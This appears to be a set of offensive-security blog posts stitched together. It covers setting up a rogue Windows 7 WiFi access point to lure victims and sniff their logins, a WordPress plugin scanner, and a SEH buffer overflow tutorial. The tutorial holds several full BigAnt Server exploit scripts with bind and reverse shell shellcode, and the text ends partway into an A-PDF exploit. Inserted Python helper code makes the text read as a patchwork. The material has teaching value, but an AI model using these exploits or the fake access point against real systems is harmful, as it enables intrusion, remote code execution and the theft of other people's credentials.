Making a fake access point in Windows 7 is now really simple. Thanks to the Wireless Hosted Network technology introduced in Windows 7 and Windows Server 2008 R2, it is possible to share an Internet connection from either a LAN or a WiFi interface.
First we need to create the new WiFi (virtual mini-port adapter) interface, with its SSID and key. Since we can't create a hosted network without authentication, a good strategy is to put the key in the SSID so people can connect to it:
C:\windows\system32>netsh wlan set hostednetwork mode=allow ssid="FreeWifi Key:12345678" key=12345678
The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.
Then we need to select the interface whose Internet connection we would like to share. To do that go to Control Panel -> Network and Internet -> Network Connections, right click on the WiFi or LAN interface, choose Properties and select the second Wireless Network Connection created just before. For this example I used the LAN interface, as in the following picture.
Finally, we need to turn on the new WiFi network:
C:\windows\system32>netsh wlan start hostednetwork
The hosted network started.
and that’s it! Let’s wait…
Now, to see whether a victim has connected to our fake access point, we use the following command:
C:\windows\system32>netsh wlan show hostednetwork
Hosted network settings
-----------------------
Mode : Allowed
SSID name : "FreeWifi Key:12345678"
Max number of clients : 100
Authentication : WPA2-Personal
Cipher : CCMP
Hosted network status
---------------------
Status : Started
BSSID : ac:81:12:6f:eb:46
Radio type : 802.11b
Channel : 11
Number of clients : 1
xx:xx:xx:xx:xx:xx Authenticated
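From the defender's side, the same netsh output can be audited on managed laptops. The following Python script is an added example, not part of the original post: it parses the output of "netsh wlan show hostednetwork" (in the format printed above; the sample text is constructed and the MAC/BSSID values are made up) and flags a hosted network that is enabled, started, has clients attached, or advertises its key in the SSID.

```python
import re

# Constructed sample of "netsh wlan show hostednetwork" output in the format
# printed above (the MAC addresses are made-up, locally administered ones).
SAMPLE_OUTPUT = """\
Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "FreeWifi Key:12345678"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : 02:00:00:11:22:33
    Radio type             : 802.11b
    Channel                : 11
    Number of clients      : 1
    02:00:00:aa:bb:cc      Authenticated
"""

# A client line is a MAC address followed by its state (Authenticated, ...).
CLIENT_RE = re.compile(r"^([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s+(\S+)$", re.I)


def parse_hostednetwork(text):
    """Turn the netsh output into {'settings': {...}, 'status': {...}, 'clients': [...]}."""
    info = {"settings": {}, "status": {}, "clients": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) == {"-"}:          # blank rows and underline rows
            continue
        if line == "Hosted network settings":
            section = "settings"
            continue
        if line == "Hosted network status":
            section = "status"
            continue
        client = CLIENT_RE.match(line)
        if client:
            info["clients"].append((client.group(1).lower(), client.group(2)))
            continue
        if section and " : " in line:
            key, _, value = line.partition(" : ")   # first " : " only; the SSID may contain ':'
            info[section][key.strip()] = value.strip()
    return info


def hosted_network_findings(info):
    """Things an administrator would want flagged on a corporate laptop.
    Remediation for a running hosted network is:
        netsh wlan stop hostednetwork
        netsh wlan set hostednetwork mode=disallow
    """
    findings = []
    settings, status = info["settings"], info["status"]
    ssid = settings.get("SSID name", "").strip('"')
    if settings.get("Mode") == "Allowed":
        findings.append("hosted network is enabled (mode=allow)")
    if status.get("Status") == "Started":
        findings.append("hosted network is running with SSID %r" % ssid)
    clients = int(status.get("Number of clients", "0"))
    if clients:
        findings.append("%d client(s) attached: %s"
                        % (clients, ", ".join(mac for mac, _ in info["clients"])))
    if re.search(r"key|pass|pwd", ssid, re.I):
        findings.append("SSID advertises its passphrase")
    return findings


if __name__ == "__main__":
    for finding in hosted_network_findings(parse_hostednetwork(SAMPLE_OUTPUT)):
        print("[!] " + finding)
```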
Obviously, since we control the network, we can sniff the traffic, and all unencrypted traffic will be visible, as shown in the following HTTP WordPress authentication:
Today, 17 March, is a national holiday in Italy, so I have spent my spare time writing a little tool: wpmap.py
As you can imagine, wpmap is a tool to discover the most commonly installed plugins on a WordPress site. It can be useful when, during a penetration test, you have time to download the plugin source code and look for issues.
Menu:
$ python wpmap.py
Simple Wordpress scanner to enumerate installed plugins by Michele `m7x` Manzotti
Version 1.0 Plugins: 104 EDB-ID: 2011-01-08
Usage: wpmap.py --site <target>
Options:
-h, --help show this help message and exit
-s SITE, --site=SITE Wordpress site
-d DIRECTORY, --directoy=DIRECTORY
Subdirectory Wordpress site
-e, --exploit Show exploit-db ID [default: False]
-v, --verbose Verbose mode[default: False]
Some screenshots:
with “-e” option:
Download:
svn co https://wpmap.svn.sourceforge.net/svnroot/wpmap wpmap
In the previous tutorial we saw some buffer overflow techniques, in most cases with the aim of overwriting EIP with the address of a jmp esp opcode. Now let's see how to exploit a buffer overflow with the SEH technique.
SEH, Structured Exception Handling, is a mechanism for catching and handling exceptions. Basically exception handlers are registered by programmers for when the program reaches a point of no return, such as a BOF. At that point the exception dispatcher walks the registered handler blocks in memory and, when it finds one that resolves the problem, the program resumes running correctly.
The exploit takes advantage of the fact that the dispatcher walks the handlers sequentially and that at the beginning of each handler record there is the address that points to the next record: NEXT SEH.
So if the current handler does not solve the problem, the program reads the NEXT SEH, the address that points to the next record, and executes that handler, and so on until the end of the chain. If it finds one that can solve the problem, the walk obviously ends there.
Not all programs that use SEH are vulnerable, but only those where you can overwrite the NEXT SEH, the address that points to the next record, with an arbitrary memory location. To check whether the program uses a vulnerable SEH, it is sufficient to load the OllySSEH plugin in OllyDbg.
If we can see DLLs where the SEH is vulnerable (i.e. not compiled with SafeSEH), then we can overwrite the SEH handler address with the address of a pop pop ret opcode, so that program flow is directed to the NEXT SEH, which will contain a jump to the shellcode.
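A quick way to check, without a debugger, why a given module is usable for this technique is to read its PE header: the DllCharacteristics flags say whether it opts into ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT), and a 32-bit image can only carry a SafeSEH handler table if it has a Load Config directory. The following Python is an added example, not code from the original post; pe_mitigations(), seh_overwrite_notes() and build_sample_pe() are names of my own, and the test image is a constructed, headers-only PE.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE optional header.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",    # module may be relocated: ASLR applies to it
    0x0100: "NX_COMPAT",       # image is marked DEP-compatible
    0x0400: "NO_SEH",          # image declares it contains no SEH handlers
    0x4000: "GUARD_CF",
}
LOAD_CONFIG_DIR = 10           # data directory holding the SafeSEH handler table (32-bit only)


def pe_mitigations(data):
    """Read the mitigation-related header fields of a PE image given as bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER, 20 bytes
    opt = coff + 20                                      # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32plus = magic == 0x20B
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    n_dirs_off = opt + (108 if pe32plus else 92)            # NumberOfRvaAndSizes
    n_dirs = struct.unpack_from("<I", data, n_dirs_off)[0]
    lc_size = 0
    if n_dirs > LOAD_CONFIG_DIR:
        _, lc_size = struct.unpack_from("<II", data, n_dirs_off + 4 + 8 * LOAD_CONFIG_DIR)
    return {
        "pe32plus": pe32plus,
        "aslr": bool(dllchars & 0x0040),
        "dep": bool(dllchars & 0x0100),
        "no_seh": bool(dllchars & 0x0400),
        "load_config_present": lc_size != 0,
        "flags": [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dllchars & bit],
    }


def seh_overwrite_notes(info):
    """Why the module matters for a stack-based SEH overwrite (what OllySSEH tells you)."""
    notes = []
    if info["pe32plus"]:
        return ["64-bit image: exception handling is table based, no handler chain on the stack"]
    if not info["aslr"]:
        notes.append("no DYNAMIC_BASE: module loads at a fixed address, so its addresses are predictable")
    if info["no_seh"]:
        notes.append("NO_SEH: the loader rejects any handler located in this module")
    elif not info["load_config_present"]:
        notes.append("no Load Config directory: no SafeSEH table, any address in the module is accepted as a handler")
    else:
        notes.append("Load Config present: check SEHandlerTable/SEHandlerCount before assuming SafeSEH")
    if not info["dep"]:
        notes.append("no NX_COMPAT: image is not marked DEP-compatible")
    return notes


def build_sample_pe(dllchars, load_config_size=0):
    """Constructed, headers-only 32-bit image (no sections) for exercising pe_mitigations()."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                            # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)   # i386, PE32 opt hdr size, DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    if load_config_size:
        struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR, 0x1000, load_config_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)
```

Run pe_mitigations(open(path, "rb").read()) on a real module to get the same report for it.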
First of all we look for an application vulnerable to SEH overwrite, e.g. BigAnt Server, as shown by the following exploit tested on Windows XP SP3; then we try to run it on Windows 7:
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s \n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])   # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
    "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
    "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
    "\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
    "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
    "\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
    "\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
    "\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
    "\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
    "\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
    "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
    "\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
    "\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
    "\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
    "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
    "\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
    "\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
    "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
    "\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
    "\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
    "\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
    "\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
    "\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
    "\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
    "\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
    "\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
    "\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
    "\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
    "\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
    "\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
    "\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
    "\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
    "\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
    "\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
    "\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
    "\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
    "\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
    "\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
    "\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
    "\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
    "\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
    "\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
    "\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
    "\x4b\x4f\x4e\x30\x41\x41"
)

payload = "\x41" * 985           # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90"    # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f"         # p/p/r from vbajet32.dll
nops = "\x90" * 10               # nop sled
sc = shellcode                   # 710 bytes available for shellcode

print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host, port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"

# milw0rm.com [2009-09-15]
Our goal is to make it work on Windows 7. With a few simple fixes we can adapt it to our needs and, at the same time, understand how to exploit a BOF with the SEH technique. Just like in the first tutorial, we calculate the offset:
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s \n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])   # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = ("")

# cyclic pattern used to find the offset of the SEH overwrite
payload = "Aa0Aa1Aa2A..."
next_seh = "\xeb\x06\x90\x90"    # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f"         # p/p/r from vbajet32.dll
nops = "\x90" * 10               # nop sled
sc = shellcode                   # 710 bytes available for shellcode

print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host, port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"

# milw0rm.com [2009-09-15]
We attach BigAnt to OllyDbg and launch the exploit.
Obviously the application crashes, but in "View" -> "SEH chain" we can see the value that overwrote the SEH handler (30684239 in my case). Now we can calculate the exact offset for Windows 7:
This means that the SEH handler is overwritten after exactly 989 bytes and the NEXT SEH after 985 (989-4).
So the exploit will be like this: [985 bytes of payload] [NEXT SEH] [SEH] [nops] [shellcode].
NEXT SEH will be overwritten with the bytes "\xeb\x06\x90\x90", an unconditional short jump of 6 bytes that lands on the nops at the beginning of the shellcode, and the SEH handler will be overwritten with an address that points to a pop pop ret opcode. This is because when an exception occurs the dispatcher builds its own frame on the stack, and in that frame the address of NEXT SEH is at ESP+8. So a pop pop ret is needed: it discards 8 bytes from the stack and then takes the value now at the top of the stack (ESP) and puts it into EIP.
This opcode can be found in VBAJET32.dll at address "0F9A19CD". So the new exploit will be as follows:
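To reproduce the offset calculation and check the jump distance on paper, the following Python is an added example (not the post's code): pattern_create() and pattern_offset() reimplement the Metasploit-style cyclic pattern used for the payload above, seh_layout() derives the field offsets from the SEH offset, and short_jmp_target() decodes the "\xeb\x06" short jump. The value 0x30684239 and the 0F9A19CD address are the ones quoted above; the function names are mine.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...: every 4-byte window is unique."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than %d bytes is not unique" % (3 * len(chunks)))


def pattern_offset(dword, length=5000):
    """Offset of the 4 bytes the debugger shows as little-endian DWORD `dword`."""
    needle = struct.pack("<I", dword).decode("ascii")
    offset = pattern_create(length).find(needle)
    if offset < 0:
        raise ValueError("0x%08x is not in the pattern" % dword)
    return offset


def seh_layout(seh_offset, nop_count=10):
    """Field offsets for [junk][NEXT SEH][SEH][nops][shellcode], given where the handler lands."""
    nseh = seh_offset - 4
    return {"junk": 0, "nseh": nseh, "seh": seh_offset,
            "nops": seh_offset + 4, "shellcode": seh_offset + 4 + nop_count}


def short_jmp_target(at, opcode):
    """Destination offset of a 2-byte short JMP (EB rel8) whose first byte is at offset `at`."""
    if len(opcode) < 2 or opcode[0] != 0xEB:
        raise ValueError("not a short jmp")
    rel = opcode[1] - 0x100 if opcode[1] >= 0x80 else opcode[1]   # signed rel8
    return at + 2 + rel          # rel8 is relative to the instruction that follows the jmp


def handler_bytes(address):
    """Little-endian encoding of a handler address, as it must appear in the buffer."""
    return struct.pack("<I", address)


def check_bigant_layout():
    """Replays the numbers from the tutorial: SEH value 0x30684239, jmp EB 06, handler 0F9A19CD."""
    seh_off = pattern_offset(0x30684239)
    layout = seh_layout(seh_off)
    lands_on = short_jmp_target(layout["nseh"], b"\xeb\x06\x90\x90")
    return {"seh": seh_off, "nseh": layout["nseh"], "jmp_lands_on": lands_on,
            "jmp_ok": lands_on == layout["nops"],     # the jump must skip the 4-byte handler
            "handler": handler_bytes(0x0F9A19CD)}


if __name__ == "__main__":
    print(check_bigant_layout())
```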
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s \n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])   # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = ("\x42" * 2000)      # placeholder to verify that we reach the shellcode

payload = "\x41" * 985           # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90"    # short jump 6 bytes
seh = "\xcd\x19\x9a\x0f"         # 0F9A19CD p/p/r from vbajet32.dll
nops = "\x90" * 10               # nop sled
sc = shellcode                   # 710 bytes available for shellcode

print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host, port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"

# milw0rm.com [2009-09-15]
Running OllyDbg with a breakpoint at the pop pop ret address "0F9A19CD", we see that execution reaches this address (if not, it means we have done something wrong) and, after the jump, reaches the shellcode.
At this point you can replace the shellcode with something more interesting, such as a TCP reverse shell:
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s \n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])   # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
    "\xda\xc9\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
    "\x6c\x49\x78\x4f\x79\x47\x70\x43\x30\x45\x50\x45\x30\x4c\x49"
    "\x4d\x35\x46\x51\x48\x52\x45\x34\x4c\x4b\x42\x72\x44\x70\x4e"
    "\x6b\x50\x52\x46\x6c\x4e\x6b\x50\x52\x46\x74\x4e\x6b\x51\x62"
    "\x46\x48\x44\x4f\x4f\x47\x42\x6a\x45\x76\x45\x61\x49\x6f\x44"
    "\x71\x4b\x70\x4c\x6c\x45\x6c\x45\x31\x43\x4c\x46\x62\x44\x6c"
    "\x51\x30\x4b\x71\x48\x4f\x44\x4d\x43\x31\x4f\x37\x4a\x42\x48"
    "\x70\x51\x42\x43\x67\x4e\x6b\x50\x52\x44\x50\x4c\x4b\x50\x42"
    "\x47\x4c\x46\x61\x48\x50\x4e\x6b\x43\x70\x42\x58\x4b\x35\x49"
    "\x50\x44\x34\x43\x7a\x46\x61\x4e\x30\x42\x70\x4c\x4b\x51\x58"
    "\x42\x38\x4c\x4b\x43\x68\x51\x30\x43\x31\x4b\x63\x48\x63\x45"
    "\x6c\x50\x49\x4e\x6b\x46\x54\x4c\x4b\x45\x51\x49\x46\x44\x71"
    "\x49\x6f\x46\x51\x4f\x30\x4c\x6c\x4b\x71\x48\x4f\x46\x6d\x43"
    "\x31\x48\x47\x47\x48\x49\x70\x42\x55\x49\x64\x44\x43\x43\x4d"
    "\x4c\x38\x45\x6b\x51\x6d\x51\x34\x51\x65\x49\x72\x43\x68\x4c"
    "\x4b\x51\x48\x44\x64\x43\x31\x4b\x63\x42\x46\x4c\x4b\x44\x4c"
    "\x50\x4b\x4e\x6b\x50\x58\x45\x4c\x45\x51\x4a\x73\x4c\x4b\x45"
    "\x54\x4e\x6b\x47\x71\x4a\x70\x4d\x59\x43\x74\x47\x54\x46\x44"
    "\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x50\x51\x49\x6f\x4b"
    "\x50\x42\x78\x43\x6f\x43\x6a\x4c\x4b\x42\x32\x48\x6b\x4e\x66"
    "\x51\x4d\x50\x68\x44\x73\x46\x52\x47\x70\x45\x50\x45\x38\x50"
    "\x77\x51\x63\x46\x52\x43\x6f\x46\x34\x42\x48\x42\x6c\x51\x67"
    "\x51\x36\x46\x67\x49\x6f\x48\x55\x48\x38\x4a\x30\x45\x51\x45"
    "\x50\x47\x70\x51\x39\x4b\x74\x42\x74\x46\x30\x42\x48\x47\x59"
    "\x4f\x70\x42\x4b\x43\x30\x4b\x4f\x4a\x75\x50\x50\x46\x30\x50"
    "\x50\x50\x50\x47\x30\x50\x50\x47\x30\x42\x70\x42\x48\x4b\x5a"
    "\x46\x6f\x4b\x6f\x4b\x50\x49\x6f\x4a\x75\x4d\x47\x43\x5a\x43"
    "\x35\x45\x38\x4f\x30\x4e\x48\x43\x31\x45\x56\x42\x48\x45\x52"
    "\x43\x30\x47\x61\x43\x6c\x4f\x79\x4b\x56\x42\x4a\x42\x30\x50"
    "\x56\x46\x37\x50\x68\x4f\x69\x4e\x45\x43\x44\x43\x51\x49\x6f"
    "\x4e\x35\x4f\x75\x4f\x30\x50\x74\x46\x6c\x4b\x4f\x50\x4e\x44"
    "\x48\x50\x75\x48\x6c\x51\x78\x48\x70\x4f\x45\x4d\x72\x43\x66"
    "\x49\x6f\x4e\x35\x51\x7a\x43\x30\x51\x7a\x44\x44\x50\x56\x51"
    "\x47\x42\x48\x43\x32\x4e\x39\x49\x58\x43\x6f\x4b\x4f\x48\x55"
    "\x4e\x6b\x44\x76\x50\x6a\x43\x70\x51\x78\x45\x50\x46\x70\x43"
    "\x30\x43\x30\x50\x56\x43\x5a\x45\x50\x43\x58\x46\x38\x4c\x64"
    "\x51\x43\x4a\x45\x4b\x4f\x4a\x75\x4f\x63\x50\x53\x51\x7a\x43"
    "\x30\x51\x46\x43\x63\x46\x37\x51\x78\x46\x62\x4a\x79\x4a\x68"
    "\x43\x6f\x49\x6f\x48\x55\x46\x61\x4b\x73\x51\x39\x48\x46\x4b"
    "\x35\x4a\x56\x44\x35\x48\x6c\x4f\x33\x46\x6a\x41\x41"
)

payload = "\x41" * 985           # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90"    # short jump 6 bytes
seh = "\xcd\x19\x9a\x0f"         # 0F9A19CD p/p/r from vbajet32.dll
nops = "\x90" * 10               # nop sled
sc = shellcode                   # 710 bytes available for shellcode
padding = "\x90" * 1300

print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host, port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + padding + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"

# milw0rm.com [2009-09-15]
After having fully understood part 1 of the tutorial, let's move on to the second one. In this tutorial we will see further techniques to exploit the BOF in the program a-pdf, a tool to convert WAV to MP3.
JUMP or CALL
With these techniques you use a register that contains the address where the shellcode resides and put that address into EIP. This technique was described in part 1 of the tutorial; a variant uses a call instead of a jmp.
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
##################################################################################
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
